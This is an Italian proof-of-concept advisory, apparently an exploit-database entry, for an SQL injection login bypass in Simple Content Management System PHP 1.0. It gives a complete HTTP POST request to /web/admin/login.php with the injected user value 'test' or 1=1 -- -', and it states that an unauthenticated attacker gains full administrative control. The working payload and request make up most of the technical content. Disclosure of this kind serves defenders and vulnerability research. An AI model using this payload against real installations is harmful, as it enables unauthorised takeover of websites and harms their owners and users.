
Proof-of-concept per l'elusione dell'autenticazione tramite SQL injection in Simple Content Management System PHP, che consente ad attaccanti non autenticati di ottenere accesso amministrativo tramite un parametro utente appositamente modificato.
Esiste una vulnerabilità di SQL Injection nella pagina di login dell'amministratore di
Simple Content Management System PHP. Il parametro user non viene
sanitizzato prima di essere passato alla query SQL, consentendo a un
attaccante non autenticato di bypassare l'autenticazione e ottenere pieno
accesso amministrativo.
/web/admin/login.phpusercode-projects.org
Simple Content Management System PHP
1.0
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
user=test'+or+1%3D1+--+-&password=test&submit=Login
oppure aggiungi semplicemente questo nella pagina di login

test' or 1=1 -- -

Un attaccante remoto non autenticato può bypassare completamente il login amministrativo senza conoscere alcuna credenziale, ottenendo pieno controllo sul pannello amministrativo, inclusa l'aggiunta di contenuti.
Imad Alvi